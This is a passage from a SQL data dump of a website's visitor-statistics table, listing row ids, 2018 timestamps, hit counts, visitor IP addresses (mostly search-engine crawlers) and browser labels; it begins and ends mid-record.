other'),(232222,1523317453,1,0,1,0,'66.249.66.156',''),(232223,1523318167,1,1,0,0,'217.69.133.29','other'),(232224,1523318229,1,1,0,0,'52.3.245.160','other'),(232225,1523318259,2,2,0,0,'178.154.171.88','other'),(232226,1523318896,2,2,0,0,'141.8.142.74','other'),(232227,1523319135,1,1,0,0,'52.3.245.160','other'),(232228,1523319461,1,1,0,0,'217.69.133.238','other'),(232229,1523320075,1,1,0,0,'52.3.245.160','other'),(232230,1523320297,2,2,0,0,'178.154.171.88','other'),(232231,1523320413,1,1,0,0,'216.244.66.237','other'),(232232,1523321014,1,1,0,0,'52.3.245.160','other'),(232233,1523321233,1,1,0,0,'141.8.142.74','other'),(232234,1523321423,1,1,0,0,'8.29.198.26','other'),(232235,1523321943,1,1,0,0,'217.69.133.250','other'),(232236,1523321955,1,1,0,0,'52.3.245.160','other'),(232237,1523321977,1,1,0,0,'180.76.15.6','other'),(232238,1523322154,1,1,0,0,'180.76.15.19','other'),(232239,1523322896,1,1,0,0,'52.3.245.160','other'),(232240,1523323591,3,3,0,0,'141.8.142.74','other'),(232241,1523323840,1,1,0,0,'52.3.245.160','other'),(232242,1523324787,1,1,0,0,'52.3.245.160','other'),(232243,1523324808,1,1,0,0,'216.244.66.237','other'),(232244,1523325149,1,1,0,0,'141.8.142.74','other'),(232245,1523325405,1,1,0,0,'178.154.171.88','other'),(232246,1523325721,1,1,0,0,'52.3.245.160','other'),(232247,1523326665,1,1,0,0,'52.3.245.160','other'),(232248,1523327606,1,1,0,0,'52.3.245.160','other'),(232249,1523328385,2,2,0,0,'95.213.141.126','opera'),(232250,1523328556,1,1,0,0,'52.3.245.160','other'),(232251,1523329392,1,1,0,0,'87.250.224.46','other'),(232252,1523329503,1,1,0,0,'52.3.245.160','other'),(232253,1523330255,2,2,0,0,'141.8.142.74','other'),(232254,1523330443,1,1,0,0,'52.3.245.160','other'),(232255,1523331044,1,1,0,0,'37.9.113.110','other'),(232256,1523331162,2,2,0,0,'141.8.142.74','other'),(232257,1523331275,1,1,0,0,'87.250.224.46','other'),(232258,1523331312,3,3,0,0,'178.154.171.88','other'),(232259,1523331388,1,1,0,0,'52.3.245.160','other'),(232260,1523331833,1,1,0,0,'35.226.23.240','other'),(232261,1523332280,1,1,0,0,'8.29.198.25','other'),(232262,1523332386,1,1,0,0,'52.3.245.160','other'),(232263,1523333232,1,1,0,0,'157.55.39.254','other'),(232264,1523333324,1,1,0,0,'216.244.66.237','other'),(232265,1523333333,1,1,0,0,'52.3.245.160','other'),(232266,1523334263,1,1,0,0,'178.154.171.88','other'),(232267,1523334285,1,1,0,0,'52.3.245.160','other'),(232268,1523334537,1,1,0,0,'216.244.66.237','other'),(232269,1523334919,3,3,0,0,'173.212.202.220','other'),(232270,1523334933,2,0,2,0,'66.249.66.156',''),(232271,1523335204,1,1,0,0,'52.3.245.160','other'),(232272,1523335906,1,1,0,0,'141.8.142.74','other'),(232273,1523335961,2,2,0,0,'178.154.171.88','other'),(232274,1523336072,1,0,1,0,'66.249.66.156',''),(232275,1523336110,1,1,0,0,'52.3.245.160','other'),(232276,1523336177,1,1,0,0,'91.196.177.46','chrome'),(232277,1523336373,1,1,0,0,'5.45.207.82','other'),(232278,1523336878,1,1,0,0,'46.201.99.163','chrome'),(232279,1523337024,1,1,0,0,'52.3.245.160','other'),(232280,1523337328,1,1,0,0,'178.154.171.88','other'),(232281,1523337434,1,1,0,0,'37.9.113.182','other'),(232282,1523337524,1,1,0,0,'217.69.133.252','other'),(232283,1523337737,1,1,0,0,'141.8.142.74','other'),(232284,1523337964,1,1,0,0,'52.3.245.160','other'),(232285,1523338281,1,1,0,0,'46.201.59.215','chrome'),(232286,1523338833,1,0,1,0,'66.249.66.158',''),(232287,1523338909,1,1,0,0,'52.3.245.160','other'),(232288,1523339447,2,2,0,0,'91.196.178.169','chrome'),(232289,1523339811,1,1,0,0,'52.3.245.160','other'),(232290,1523340693,1,1,0,0,'216.244.66.237','other'),(232291,1523340762,1,1,0,0,'52.3.245.160','other'),(232292,1523340774,1,1,0,0,'178.154.171.88','other'),(232293,1523340808,1,1,0,0,'95.132.5.40','firefox'),(232294,1523340974,1,1,0,0,'141.8.142.74','other'),(232295,1523341172,2,2,0,0,'130.180.216.91','chrome'),(232296,1523341722,1,1,0,0,'52.3.245.160','other'),(232297,1523342214,2,2,0,0,'194.37.248.11','chrome'),(232298,1523342669,1,1,0,0,'52.3.245.160','other'),(232299,1523342679,1,1,0,0,'66.249.66.199','chrome'),(232300,1523342730,1,1,0,0,'157.55.39.252','other'),(232301,1523342853,2,2,0,0,'91.196.178.103','chrome'),(232302,1523343125,1,1,0,0,'8.29.198.25','other'),(232303,1523343360,1,1,0,0,'188.166.101.66','chrome'),(232304,1523343573,1,1,0,0,'52.3.245.160','other'),(232305,1523343906,1,1,0,0,'216.244.66.237','other'),(232306,1523343931,1,1,0,0,'194.37.248.11','chrome'),(232307,1523344515,1,1,0,0,'52.3.245.160','other'),(232308,1523344599,3,3,0,0,'141.8.142.74','other'),(232309,1523344731,1,1,0,0,'178.154.171.88','other'),(232310,1523345459,1,1,0,0,'52.3.245.160','other'),(232311,1523345560,1,1,0,0,'141.8.142.74','other'),(232312,1523346030,1,1,0,0,'207.46.13.80','other'),(232313,1523346399,1,1,0,0,'52.3.245.160','other'),(232314,1523347112,1,1,0,0,'95.67.118.90','chrome'),(232315,1523347316,1,1,0,0,'52.3.245.160','other'),(232316,1523347755,1,1,0,0,'37.9.113.134','other'),(232317,1523347899,1,1,0,0,'91.196.178.86','chrome'),(232318,1523347939,1,1,0,0,'178.154.171.88','other'),(232319,1523347959,1,0,1,0,'66.249.66.157',''),(232320,1523348254,1,1,0,0,'52.3.245.160','other'),(232321,1523348378,1,1,0,0,'87.250.224.46','other'),(232322,1523349199,1,1,0,0,'52.3.245.160','other'),(232323,1523349341,2,2,0,0,'87.250.224.46','other'),(232324,1523349644,1,1,0,0,'41.113.52.178','msie'),(232325,1523350102,2,2,0,0,'35.226.23.240','other'),(232326,1523350138,1,1,0,0,'52.3.245.160','other'),(232327,1523350396,2,2,0,0,'130.180.216.47','chrome'),(232328,1523350862,2,2,0,0,'91.196.178.18','chrome'),(232329,1523351052,1,1,0,0,'52.3.245.160','other'),(232330,1523351394,1,1,0,0,'91.196.178.86','chrome'),(232331,1523351447,1,1,0,0,'157.55.39.254','other'),(232332,1523351990,1,1,0,0,'52.3.245.160','other'),(232333,1523352067,1,1,0,0,'31.43.31.241','chrome'),(232334,1523352077,1,1,0,0,'82.144.213.186','chrome'),(232335,1523352888,1,0,1,0,'66.249.66.156',''),(232336,1523352932,1,1,0,0,'52.3.245.160','other'),(232337,1523353343,1,1,0,0,'180.76.15.139','other'),(232338,1523353553,1,1,0,0,'35.226.23.240','other'),(232339,1523353561,1,1,0,0,'91.196.178.88','chrome'),(232340,1523353816,2,2,0,0,'141.8.142.74','other'),(232341,1523353875,1,1,0,0,'52.3.245.160','other'),(232342,1523353970,1,1,0,0,'8.29.198.25','other'),(232343,1523354261,1,1,0,0,'195.211.174.93','chrome'),(232344,1523354603,1,1,0,0,'91.196.178.161','chrome'),(232345,1523354785,1,1,0,0,'52.3.245.160','other'),(232346,1523354937,1,1,0,0,'180.76.15.14','other'),(232347,1523355464,2,2,0,0,'91.196.178.18','chrome'),(232348,1523355729,1,1,0,0,'52.3.245.160','other'),(232349,1523355936,1,1,0,0,'91.196.178.77','firefox'),(232350,1523356685,1,1,0,0,'52.3.245.160','other'),(232351,1523356688,3,3,0,0,'141.8.142.74','other'),(232352,1523357392,1,1,0,0,'178.154.171.88','other'),(232353,1523357587,1,1,0,0,'52.3.245.160','other'),(232354,1523358073,2,2,0,0,'141.8.142.74','other'),(232355,1523358524,1,1,0,0,'46.211.109.201','other'),(232356,1523358535,1,1,0,0,'52.3.245.160','other'),(232357,1523358930,1,1,0,0,'95.132.5.40','firefox'),(232358,1523359451,2,2,0,0,'91.196.178.18','chrome'),(232359,1523359488,1,1,0,0,'52.3.245.160','other'),(232360,1523359559,2,2,0,0,'207.46.13.80','other'),(232361,1523359877,1,1,0,0,'46.164.130.92','chrome'),(232362,1523360037,1,1,0,0,'54.67.59.131','chrome'),(232363,1523360424,1,1,0,0,'52.3.245.160','other'),(232364,1523360559,1,1,0,0,'213.180.203.8','other'),(232365,1523360943,1,1,0,0,'207.46.13.123','other'),(232366,1523361336,1,1,0,0,'52.3.245.160','other'),(232367,1523361473,2,2,0,0,'91.196.178.18','chrome'),(232368,1523361667,3,3,0,0,'91.196.178.68','chrome'),(232369,1523361951,1,1,0,0,'194.37.248.11','chrome'),(232370,1523361989,1,1,0,0,'37.9.113.101','other'),(232371,1523362067,1,1,0,0,'178.154.171.88','other'),(232372,1523362275,1,1,0,0,'52.3.245.160','other'),(232373,1523362286,2,2,0,0,'78.111.190.135','chrome'),(232374,1523362964,1,1,0,0,'91.124.182.170','firefox'),(232375,1523363022,1,1,0,0,'35.226.23.240','other'),(232376,1523363213,1,1,0,0,'52.3.245.160','other'),(232377,1523363231,1,1,0,0,'178.154.171.88','other'),(232378,1523363601,1,1,0,0,'178.154.200.41','other'),(232379,1523363946,1,0,1,0,'66.249.66.156',''),(232380,1523364128,1,1,0,0,'52.3.245.160','other'),(232381,1523364226,1,1,0,0,'46.201.59.215','chrome'),(232382,1523364815,1,1,0,0,'8.29.198.26','other'),(232383,1523364975,1,1,0,0,'195.211.174.93','chrome'),(232384,1523365033,1,1,0,0,'52.3.245.160','other'),(232385,1523365509,1,1,0,0,'178.154.171.4','other'),(232386,1523365911,1,1,0,0,'91.229.121.2','chrome'),(232387,1523365937,1,1,0,0,'52.3.245.160','other'),(232388,1523366620,1,1,0,0,'91.196.178.103','chrome'),(232389,1523366630,1,1,0,0,'91.196.178.88','chrome'),(232390,1523366662,1,1,0,0,'91.196.178.77','firefox'),(232391,1523366701,1,1,0,0,'91.196.178.86','chrome'),(232392,1523366842,1,1,0,0,'52.3.245.160','other'),(232393,1523367235,1,1,0,0,'207.244.149.74','chrome'),(232394,1523367509,2,2,0,0,'91.196.178.68','chrome'),(232395,1523367643,1,1,0,0,'46.211.69.186','chrome'),(232396,1523367645,1,1,0,0,'141.8.142.74','other'),(232397,1523367648,1,1,0,0,'87.250.224.46','other'),(232398,1523367745,1,1,0,0,'52.3.245.160','other'),(232399,1523368664,1,1,0,0,'52.3.245.160','other'),(232400,1523368699,2,2,0,0,'91.196.178.68','chrome'),(232401,1523368711,1,1,0,0,'91.196.178.129','firefox'),(232402,1523368971,1,1,0,0,'207.46.13.80','other'),(232403,1523368995,2,2,0,0,'91.196.178.169','chrome'),(232404,1523369142,1,0,1,0,'66.249.66.157',''),(232405,1523369568,1,1,0,0,'52.3.245.160','other'),(232406,1523369664,1,0,1,0,'66.249.66.156',''),(232407,1523370472,1,1,0,0,'52.3.245.160','other'),(232408,1523370790,1,1,0,0,'91.196.178.86','chrome'),(232409,1523371062,1,1,0,0,'93.170.117.69','chrome'),(232410,1523371388,1,1,0,0,'52.3.245.160','other'),(232411,1523371784,1,1,0,0,'216.244.66.237','other'),(232412,1523371978,2,2,0,0,'91.196.178.18','firefox'),(232413,1523372255,1,1,0,0,'93.77.140.160','chrome'),(232414,1523372290,1,1,0,0,'52.3.245.160','other'),(232415,1523372470,1,1,0,0,'141.8.142.74','other'),(232416,1523372771,1,1,0,0,'216.244.66.237','other'),(232417,1523373083,1,1,0,0,'66.249.66.195','chrome'),(232418,1523373215,1,1,0,0,'52.3.245.160','other'),(232419,1523373718,1,1,0,0,'216.244.66.237','other'),(232420,1523374124,1,1,0,0,'52.3.245.160','other'),(232421,1523374625,1,1,0,0,'207.46.13.80','other'),(232422,1523375042,1,1,0,0,'52.3.245.160','other'),(232423,1523375109,1,1,0,0,'87.250.224.46','other'),(232424,1523375686,1,1,0,0,'8.29.198.26','other'),(232425,1523375956,1,1,0,0,'52.3.245.160','other'),(232426,1523376443,1,1,0,0,'54.165.59.7','other'),(232427,1523376869,1,1,0,0,'52.3.245.160','other'),(232428,1523377774,1,1,0,0,'52.3.245.160','other'),(232429,1523378698,1,1,0,0,'52.3.245.160','other'),(232430,1523378921,1,1,0,0,'194.187.171.221','other'),(232431,1523379064,2,2,0,0,'216.244.66.237','other'),(232432,1523379349,1,1,0,0,'217.69.133.218','other'),(232433,1523379616,1,1,0,0,'52.3.245.160','other'),(232434,1523380521,1,1,0,0,'52.3.245.160','other'),(232435,1523381392,2,2,0,0,'141.8.142.74','other'),(232436,1523381441,1,1,0,0,'52.3.245.160','other'),(232437,1523382274,1,1,0,0,'178.154.171.10','other'),(232438,1523382347,1,1,0,0,'52.3.245.160','other'),(232439,1523383099,2,2,0,0,'95.135.90.132','chrome'),(232440,1523383266,1,1,0,0,'52.3.245.160','other'),(232441,1523383928,2,2,0,0,'91.196.178.25','chrome'),(232442,1523384177,1,1,0,0,'52.3.245.160','other'),(232443,1523384217,1,1,0,0,'141.8.142.74','other'),(232444,1523385102,1,1,0,0,'178.154.171.88','other'),(232445,1523385104,1,1,0,0,'52.3.245.160','other'),(232446,1523385784,1,1,0,0,'52.87.86.158','chrome'),(232447,1523385816,1,1,0,0,'142.44.159.96','other'),(232448,1523386008,1,1,0,0,'52.3.245.160','other'),(232449,1523386185,1,1,0,0,'141.8.142.74','other'),(232450,1523386479,1,1,0,0,'216.244.66.237','other'),(232451,1523386544,1,1,0,0,'8.29.198.27','other'),(232452,1523386793,1,1,0,0,'37.9.113.115','other'),(232453,1523386927,1,1,0,0,'52.3.245.160','other'),(232454,1523387846,1,1,0,0,'52.3.245.160','other'),(232455,1523387871,2,2,0,0,'91.196.178.57','chrome'),(232456,1523388762,1,1,0,0,'52.3.245.160','other'),(232457,1523389264,1,0,1,0,'66.249.66.195',''),(232458,1523389386,1,1,0,0,'178.154.171.88','other'),(232459,1523389675,1,1,0,0,'52.3.245.160','other'),(232460,1523389796,2,2,0,0,'91.196.178.164','chrome'),(232461,1523389897,28,28,0,0,'167.114.219.41','other'),(232462,1523390582,1,1,0,0,'52.3.245.160','other'),(232463,1523390653,1,1,0,0,'178.154.171.88','other'),(232464,1523391497,1,1,0,0,'52.3.245.160','other'),(232465,1523391716,1,1,0,0,'178.154.171.88','other'),(232466,1523391993,2,2,0,0,'216.244.66.237','other'),(232467,1523392416,1,1,0,0,'52.3.245.160','other'),(232468,1523392488,1,1,0,0,'141.8.142.74','other'),(232469,1523393317,1,1,0,0,'52.3.245.160','other'),(232470,1523393792,1,1,0,0,'216.244.66.237','other'),(232471,1523394180,2,2,0,0,'141.8.142.74','other'),(232472,1523394222,1,1,0,0,'52.3.245.160','other'),(232473,1523394656,1,1,0,0,'178.154.171.88','other'),(232474,1523395125,1,1,0,0,'52.3.245.160','other'),(232475,1523395241,1,1,0,0,'141.8.142.152','other'),(232476,1523396030,1,1,0,0,'52.3.245.160','other'),(232477,1523396950,1,1,0,0,'52.3.245.160','other'),(232478,1523397386,1,1,0,0,'8.29.198.25','other'),(232479,1523397816,2,2,0,0,'141.8.142.74','other'),(232480,1523397856,1,1,0,0,'52.3.245.160','other'),(232481,1523398422,1,1,0,0,'178.154.171.88','other'),(232482,1523398762,1,1,0,0,'52.3.245.160','other'),(232483,1523399728,2,0,2,0,'66.249.66.157',''),(232484,1523399740,1,1,0,0,'52.3.245.160','other'),(232485,1523400333,1,1,0,0,'216.244.66.237','other'),(232486,1523400663,1,1,0,0,'52.3.245.160','other'),(232487,1523401578,1,1,0,0,'52.3.245.160','other'),(232488,1523402566,1,0,1,0,'66.249.66.195',''),(232489,1523403187,1,1,0,0,'216.244.66.237','other'),(232490,1523403423,1,1,0,0,'180.76.15.19','other'),(232491,1523403529,1,1,0,0,'141.8.142.74','other'),(232492,1523404313,1,0,1,0,'66.249.66.195',''),(232493,1523404443,1,0,1,0,'66.249.66.157',''),(232494,1523404465,1,1,0,0,'66.249.66.195','chrome'),(232495,1523404487,1,1,0,0,'66.249.66.156','chrome'),(232496,1523405684,1,1,0,0,'217.69.143.217','firefox'),(232497,1523406466,1,1,0,0,'207.46.13.109','other'),(232498,1523408064,1,1,0,0,'216.244.66.237','other'),(232499,1523408237,1,1,0,0,'8.29.198.26','other'),(232500,1523409241,1,1,0,0,'207.46.13.109','other'),(232501,1523409682,1,0,1,0,'66.249.66.201',''),(232502,1523411761,1,1,0,0,'207.46.13.109','other'),(232503,1523412716,1,1,0,0,'35.226.23.240','other'),(232504,1523413399,1,0,1,0,'66.249.66.201',''),(232505,1523416606,1,0,1,0,'66.249.66.195',''),(232506,1523417186,2,0,2,0,'66.249.66.201',''),(232507,1523417776,1,1,0,0,'141.8.142.74','other'),(232508,1523418899,1,1,0,0,'216.244.66.237','other'),(232509,1523419079,1,1,0,0,'8.29.198.26','other'),(232510,1523421912,1,0,1,0,'66.249.66.199',''),(232511,1523422940,1,0,1,0,'66.249.66.201',''),(232512,1523423092,1,1,0,0,'216.244.66.237','other'),(232513,1523423989,1,1,0,0,'207.46.13.109','other'),(232514,1523424335,1,0,1,0,'66.249.66.201',''),(232515,1523425300,2,2,0,0,'91.196.178.169','chrome'),(232516,1523425604,2,2,0,0,'91.196.178.68','chrome'),(232517,1523425800,1,0,1,0,'66.249.66.201',''),(232518,1523426010,1,0,1,0,'66.249.66.195',''),(232519,1523426024,1,1,0,0,'46.201.59.215','chrome'),(232520,1523426556,1,0,1,0,'66.249.66.156',''),(232521,1523426557,2,1,1,0,'66.249.66.201',''),(232522,1523426559,1,1,0,0,'66.249.66.156','chrome'),(232523,1523426690,2,2,0,0,'136.243.68.226','other'),(232524,1523426933,1,0,1,0,'66.249.66.199',''),(232525,1523427814,2,0,2,0,'66.249.66.195',''),(232526,1523427944,2,2,0,0,'91.196.178.68','chrome'),(232527,1523428042,2,2,0,0,'195.230.119.59','chrome'),(232528,1523428376,1,1,0,0,'176.38.38.40','chrome'),(232529,1523428405,1,0,1,0,'66.249.66.199',''),(232530,1523428616,1,1,0,0,'123.207.29.152','other'),(232531,1523429080,1,1,0,0,'193.106.30.99','firefox'),(232532,1523429336,1,1,0,0,'188.230.43.254','other'),(232533,1523429567,3,3,0,0,'91.196.178.18','chrome'),(232534,1523429728,1,0,1,0,'66.249.66.199',''),(232535,1523429822,1,0,1,0,'66.249.66.201',''),(232536,1523429926,1,1,0,0,'8.29.198.27','other'),(232537,1523430779,1,1,0,0,'91.196.178.18','chrome'),(232538,1523431708,1,1,0,0,'91.196.177.46','chrome'),(232539,1523431751,1,1,0,0,'77.111.244.13','chrome'),(232540,1523431762,1,1,0,0,'188.230.43.254','other'),(232541,1523432538,1,1,0,0,'37.55.9.207','firefox'),(232543,1523432708,1,0,1,0,'66.249.66.201',''),(232544,1523432903,1,1,0,0,'66.249.66.199','chrome'),(232545,1523432905,1,1,0,0,'66.249.66.156','chrome'),(232546,1523433774,1,1,0,0,'91.196.178.38','chrome'),(232547,1523433998,2,2,0,0,'91.196.178.68','chrome'),(232548,1523434266,1,0,1,0,'66.249.66.199',''),(232549,1523434279,1,1,0,0,'141.8.142.74','other'),(232550,1523434853,1,1,0,0,'217.69.136.207','other'),(232551,1523435612,1,0,1,0,'66.249.66.201',''),(232552,1523436130,7,7,0,0,'46.211.106.13','chrome'),(232553,1523436152,1,0,1,0,'66.249.66.199',''),(232554,1523436203,1,1,0,0,'91.196.178.86','chrome'),(232555,1523436463,1,1,0,0,'141.8.132.19','other'),(232556,1523436650,1,1,0,0,'141.8.142.74','other'),(232557,1523436670,2,2,0,0,'195.181.174.55','other'),(232558,1523436772,1,1,0,0,'46.211.113.169','other'),(232559,1523437119,6,6,0,0,'46.211.106.13','chrome'),(232560,1523437143,2,2,0,0,'37.9.113.182','other'),(232561,1523437277,3,3,0,0,'46.211.27.168','chrome'),(232562,1523437335,1,1,0,0,'194.143.144.18','chrome'),(232563,1523437682,2,2,0,0,'91.196.178.167','chrome'),(232564,1523437713,1,1,0,0,'141.8.142.74','other'),(232565,1523437778,1,0,1,0,'66.249.66.158',''),(232566,1523437786,1,0,1,0,'66.249.66.195',''),(232567,1523437951,1,1,0,0,'91.196.177.46','chrome'),(232568,1523438010,1,1,0,0,'66.249.66.195','chrome'),(232569,1523438024,1,1,0,0,'66.249.66.157','chrome'),(232570,1523438263,3,3,0,0,'178.154.171.88','other'),(232571,1523438767,1,1,0,0,'95.132.50.126','firefox'),(232572,1523438925,2,2,0,0,'91.196.178.68','chrome'),(232573,1523438976,1,0,1,0,'66.249.66.199',''),(232574,1523439084,10,10,0,0,'69.58.178.57','other'),(232575,1523439322,1,1,0,0,'141.8.142.74','other'),(232576,1523439525,2,2,0,0,'194.143.144.18','chrome'),(232577,1523439773,1,1,0,0,'193.23.140.240','firefox'),(232578,1523439838,1,1,0,0,'157.55.39.228','other'),(232579,1523440683,1,0,1,0,'66.249.66.201',''),(232580,1523440763,1,1,0,0,'8.29.198.27','other'),(232581,1523441013,1,1,0,0,'46.211.26.238','chrome'),(232582,1523441332,1,1,0,0,'87.250.224.46','other'),(232583,1523441413,2,2,0,0,'130.180.218.178','chrome'),(232584,1523441415,1,1,0,0,'46.219.6.41','chrome'),(232585,1523441455,1,1,0,0,'46.211.102.118','chrome'),(232586,1523441729,1,1,0,0,'141.8.142.74','other'),(232587,1523442675,1,1,0,0,'37.9.113.101','other'),(232588,1523442703,1,0,1,0,'66.249.66.195',''),(232589,1523442731,1,1,0,0,'46.211.102.118','chrome'),(232590,1523443325,1,1,0,0,'141.8.142.74','other'),(232591,1523443607,1,0,1,0,'66.249.66.199',''),(232592,1523443788,1,1,0,0,'66.249.66.195','chrome'),(232593,1523443792,1,1,0,0,'66.249.66.156','chrome'),(232594,1523444641,1,1,0,0,'46.211.102.118','chrome'),(232595,1523444720,1,1,0,0,'91.209.11.236','other'),(232596,1523444993,1,0,1,0,'66.249.66.195',''),(232597,1523445687,3,3,0,0,'195.10.210.70','chrome'),(232598,1523446142,1,1,0,0,'212.55.88.12','chrome'),(232599,1523446420,1,0,1,0,'66.249.66.201',''),(232600,1523446425,2,0,2,0,'66.249.66.199',''),(232601,1523447340,1,0,1,0,'66.249.66.199',''),(232602,1523447686,1,0,1,0,'66.249.66.158',''),(232603,1523448341,1,1,0,0,'91.124.182.170','firefox'),(232604,1523448369,2,2,0,0,'130.180.220.56','chrome'),(232605,1523448475,1,0,1,0,'66.249.66.195',''),(232606,1523448770,1,1,0,0,'66.249.66.199','chrome'),(232607,1523448774,1,1,0,0,'66.249.66.157','chrome'),(232608,1523450024,1,1,0,0,'207.46.13.109','other'),(232609,1523451104,1,1,0,0,'91.209.11.236','other'),(232610,1523451244,1,1,0,0,'37.52.110.100','chrome'),(232611,1523451533,2,2,0,0,'91.196.178.86','firefox'),(232612,1523451592,1,1,0,0,'37.9.113.110','other'),(232613,1523451604,1,1,0,0,'8.29.198.27','other'),(232614,1523451702,2,2,0,0,'91.196.178.40','chrome'),(232615,1523452003,1,1,0,0,'91.207.245.147','chrome'),(232616,1523452106,1,0,1,0,'66.249.66.195',''),(232617,1523452575,2,2,0,0,'178.154.171.88','other'),(232618,1523452705,1,1,0,0,'180.76.15.8','other'),(232619,1523452832,3,3,0,0,'91.196.178.40','chrome'),(232620,1523452848,1,1,0,0,'91.196.178.135','firefox'),(232621,1523453185,1,1,0,0,'91.207.245.147','chrome'),(232622,1523453535,1,1,0,0,'91.196.178.162','chrome'),(232623,1523453867,2,2,0,0,'141.8.142.74','other'),(232624,1523454741,1,1,0,0,'66.249.66.199','chrome'),(232625,1523454771,1,1,0,0,'66.249.66.157','chrome'),(232626,1523455235,2,2,0,0,'37.54.114.62','chrome'),(232627,1523455407,1,1,0,0,'92.112.125.243','chrome'),(232628,1523455484,1,1,0,0,'188.230.43.254','other'),(232629,1523455616,2,2,0,0,'91.196.178.40','chrome'),(232630,1523455915,1,1,0,0,'91.196.177.46','firefox'),(232631,1523456033,1,1,0,0,'91.211.132.76','chrome'),(232632,1523456081,1,1,0,0,'178.154.171.60','other'),(232633,1523456111,1,1,0,0,'141.8.142.74','other'),(232634,1523456368,1,1,0,0,'91.196.178.72','firefox'),(232635,1523457203,1,1,0,0,'91.196.178.40','chrome'),(232636,1523457355,1,0,1,0,'66.249.66.158',''),(232637,1523457459,2,0,2,0,'66.249.66.199',''),(232638,1523457882,1,1,0,0,'188.230.43.254','other'),(232639,1523457897,1,1,0,0,'216.244.66.237','other'),(232640,1523457910,1,0,1,0,'66.249.66.157',''),(232641,1523458189,3,3,0,0,'91.196.178.40','chrome'),(232642,1523458423,1,1,0,0,'141.8.142.74','other'),(232643,1523458764,1,0,1,0,'66.249.66.201',''),(232644,1523459097,2,1,1,0,'66.249.66.195',''),(232645,1523459390,2,2,0,0,'141.8.142.74','other'),(232646,1523459579,1,1,0,0,'91.196.177.46','chrome'),(232647,1523459842,1,1,0,0,'37.52.129.73','chrome'),(232648,1523460115,1,1,0,0,'178.93.148.238','chrome'),(232649,1523460278,1,1,0,0,'188.230.43.254','other'),(232650,1523460382,1,1,0,0,'66.249.66.195','chrome'),(232651,1523460406,1,1,0,0,'66.249.66.157','chrome'),(232652,1523461080,2,0,2,0,'66.249.66.201',''),(232653,1523461360,1,0,1,0,'66.249.66.195',''),(232654,1523462145,2,2,0,0,'141.8.142.74','other'),(232655,1523462339,5,5,0,0,'91.196.178.40','chrome'),(232656,1523462452,1,1,0,0,'8.29.198.27','other'),(232657,1523462681,1,1,0,0,'188.230.43.254','other'),(232658,1523462682,1,0,1,0,'66.249.66.199',''),(232659,1523462738,1,1,0,0,'37.9.113.182','other'),(232660,1523462876,1,1,0,0,'91.196.178.97','chrome'),(232661,1523463104,1,1,0,0,'185.103.254.68','chrome'),(232662,1523463729,2,2,0,0,'141.8.142.74','other'),(232663,1523464159,1,1,0,0,'87.250.224.46','other'),(232664,1523464622,2,2,0,0,'188.163.18.67','chrome'),(232665,1523465392,1,1,0,0,'66.249.66.199','chrome'),(232666,1523465434,1,1,0,0,'66.249.66.157','chrome'),(232667,1523465530,1,1,0,0,'188.244.32.76','other'),(232668,1523466091,3,3,0,0,'141.8.142.74','other'),(232669,1523466536,1,1,0,0,'95.135.240.248','chrome'),(232670,1523466610,2,2,0,0,'178.92.249.57','chrome'),(232671,1523467135,2,0,2,0,'66.249.66.195',''),(232672,1523467246,1,0,1,0,'66.249.66.156',''),(232673,1523468003,1,0,1,0,'66.249.66.201',''),(232674,1523469632,1,1,0,0,'95.133.238.120','firefox'),(232675,1523469776,1,1,0,0,'95.28.165.113','msie'),(232676,1523470007,1,0,1,0,'66.249.66.201',''),(232677,1523470279,1,1,0,0,'66.249.66.199','chrome'),(232678,1523470290,1,0,1,0,'66.249.66.195',''),(232679,1523470614,2,2,0,0,'91.196.178.40','chrome'),(232680,1523470937,1,1,0,0,'66.249.66.157','chrome'),(232681,1523471574,1,1,0,0,'178.154.171.88','other'),(232682,1523471579,1,1,0,0,'216.244.66.237','other'),(232683,1523471858,3,0,3,0,'66.249.66.201',''),(232684,1523472432,1,1,0,0,'91.214.85.232','chrome'),(232685,1523473031,1,1,0,0,'31.128.251.29','chrome'),(232686,1523473224,1,1,0,0,'216.244.66.237','other'),(232687,1523473291,1,1,0,0,'8.29.198.27','other'),(232688,1523473862,1,1,0,0,'141.8.142.74','other'),(232689,1523474117,2,2,0,0,'91.196.178.162','chrome'),(232690,1523474579,1,1,0,0,'216.244.66.237','other'),(232691,1523474617,2,0,2,0,'66.249.66.201',''),(232692,1523474841,1,0,1,0,'66.249.66.199',''),(232693,1523475795,1,1,0,0,'178.154.171.88','other'),(232694,1523476098,1,1,0,0,'66.249.66.156','chrome'),(232695,1523476224,1,1,0,0,'216.244.66.237','other'),(232696,1523476738,1,0,1,0,'66.249.66.195',''),(232697,1523477245,1,1,0,0,'217.69.136.204','other'),(232698,1523477354,1,0,1,0,'66.249.66.201',''),(232699,1523477561,1,1,0,0,'141.8.142.74','other'),(232700,1523477613,1,1,0,0,'66.249.66.201','chrome'),(232701,1523477638,1,0,1,0,'66.249.66.158',''),(232702,1523478664,1,1,0,0,'87.250.224.46','other'),(232703,1523478798,1,0,1,0,'66.249.66.195',''),(232704,1523478833,1,0,1,0,'66.249.66.199',''),(232705,1523478849,1,0,1,0,'66.249.66.201',''),(232706,1523479186,1,1,0,0,'141.8.142.74','other'),(232707,1523479976,1,1,0,0,'176.37.100.253','chrome'),(232708,1523480254,1,1,0,0,'185.183.105.211','firefox'),(232709,1523480579,1,1,0,0,'216.244.66.237','other'),(232710,1523481269,1,1,0,0,'141.8.142.74','other'),(232711,1523481328,1,1,0,0,'66.249.66.156','chrome'),(232712,1523481787,1,0,1,0,'66.249.66.157',''),(232713,1523482357,1,1,0,0,'217.69.133.30','other'),(232714,1523482423,1,1,0,0,'141.8.142.74','other'),(232715,1523482950,3,3,0,0,'69.30.221.250','other'),(232716,1523483141,1,1,0,0,'217.69.136.209','other'),(232717,1523483161,1,0,1,0,'66.249.66.195',''),(232718,1523483505,1,1,0,0,'66.249.66.199','chrome'),(232719,1523484091,1,1,0,0,'217.69.136.207','other'),(232720,1523484130,1,1,0,0,'8.29.198.25','other'),(232721,1523485782,1,1,0,0,'141.8.142.74','other'),(232722,1523486007,1,0,1,0,'66.249.66.156',''),(232723,1523486142,1,0,1,0,'66.249.66.158',''),(232724,1523486446,1,0,1,0,'66.249.66.195',''),(232725,1523488459,1,0,1,0,'66.249.66.201',''),(232726,1523488598,1,1,0,0,'216.244.66.237','other'),(232727,1523488689,1,1,0,0,'207.46.13.30','other'),(232728,1523489010,1,1,0,0,'66.249.66.157','chrome'),(232729,1523489908,1,0,1,0,'66.249.66.199',''),(232730,1523489982,1,0,1,0,'66.249.66.201',''),(232731,1523490098,1,1,0,0,'216.244.66.237','other'),(232732,1523490546,1,1,0,0